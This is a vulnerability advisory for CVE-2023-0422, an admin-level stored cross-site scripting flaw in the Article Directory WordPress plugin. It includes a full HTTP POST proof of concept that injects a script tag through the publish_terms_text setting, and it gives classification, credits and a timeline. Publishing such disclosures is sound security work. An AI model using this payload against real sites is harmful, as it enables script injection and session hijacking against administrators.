WordPress Plugin Vulnerabilities

Article Directory <= 1.3 - Admin+ Stored XSS

Description

The plugin does not properly sanitize the `publish_terms_text` setting before displaying it in the administration panel, which may enable administrators to conduct Stored XSS attacks in multisite contexts.

Proof of Concept

```
POST /wordpress/wp-admin/options.php HTTP/1.1
Host: 172.28.128.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://172.28.128.6/wordpress/wp-admin/options-general.php?page=article-directory%2Farticle-directory.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 1234
Origin: http://172.28.128.6
Connection: close
Cookie: wordpress_b92078c82d0f1044cdfb065e7ae28bec=admin%7C1672746064%7CQtuyq4Np2JGSAZb83cNhdojTDRRIDPVisa0ndOhoEPO%7Cec675c4bca520751295d2189a34017309eeba5b54a5f39c1c85643a6c0718e17; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_b92078c82d0f1044cdfb065e7ae28bec=admin%7C1672746064%7CQtuyq4Np2JGSAZb83cNhdojTDRRIDPVisa0ndOhoEPO%7Cbc4ecbc11fae0c1cfc10ad70b8372835f2b30f3abed1872afa83058e16611a00; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1672573750
Upgrade-Insecure-Requests: 1

option_page=article_directory&action=update&_wpnonce=374f46ff36&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Darticle-directory%252Farticle-directory.php&article_directory%5Bcolumn_count%5D=3&article_directory%5Bsort_by%5D=0&article_directory%5Bsort_direction%5D=0&article_directory%5Bshow_parent_count%5D=1&article_directory%5Bdesc_for_parent_title%5D=1&article_directory%5Bno_child_alert%5D=1&article_directory%5Bshow_child%5D=1&article_directory%5Bshow_child_count%5D=1&article_directory%5Bmaximum_child%5D=0&article_directory%5Bdesc_for_child_title%5D=1&article_directory%5Bchild_hierarchical%5D=1&article_directory%5Bhide_empty%5D=0&article_directory%5Bexclude_cats%5D=0&article_directory%5Bauthor_interface%5D=0&article_directory%5Bauthor_panel_id%5D=123&article_directory%5Barticle_status%5D=0&article_directory%5Bminimum_symbols%5D=700&article_directory%5Bmaximum_links%5D=3&article_directory%5Bshow_editor%5D=1&article_directory%5Bdefault_editor%5D=html&article_directory%5Bsel_only_one_cat%5D=1&article_directory%5Bshow_tags%5D=0&article_directory%5Ballow_new_tags%5D=0&article_directory%5Bpublish_terms_text%5D=asdfghj</textarea></td><script>alert(document.domain)</script>&article_directory%5Bkinderloss%5D=1&article_directory%5Bshow_article_code%5D=0
```

Please replace the nonce and cookie values.

This exploit works for inter-admin.

Affects Plugins

Plugin icon
article-directory
No known fix

References

CVE
CVE-2023-0422

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
3.4 (low)

Miscellaneous

Original Researcher
Shreya Pohekar
Submitter
Shreya Pohekar
Submitter website
https://shreyapohekar.com
Submitter twitter
shreyapohekar
Verified
Yes
WPVDB ID
d57f2fb2-5251-4069-8c9a-a4af269c5e62

Timeline

Publicly Published
2023-03-17 (about 1 years ago)
Added
2023-03-17 (about 1 years ago)
Last Updated
2023-03-17 (about 1 years ago)

Other

Published
Title
Published
2018-12-02
Title
Contact Form by WPForms < 1.4.8 - Authenticated Stored Cross-Site Scripting (XSS)
Published
2012-01-26
Title
Slideshow Gallery 2 <= 1.1.4 - Cross-Site Scripting (XSS)
Published
2024-03-13
Title
WPFunnels < 3.0.7 - Authenticated (Administrator+) Stored Cross-Site Scripting
Published
2023-10-16
Title
EG-Attachments <= 2.1.3 - Reflected XSS
Published
2014-08-01
Title
copy-in-clipboard <= 0.8 - XSS in ZeroClipboard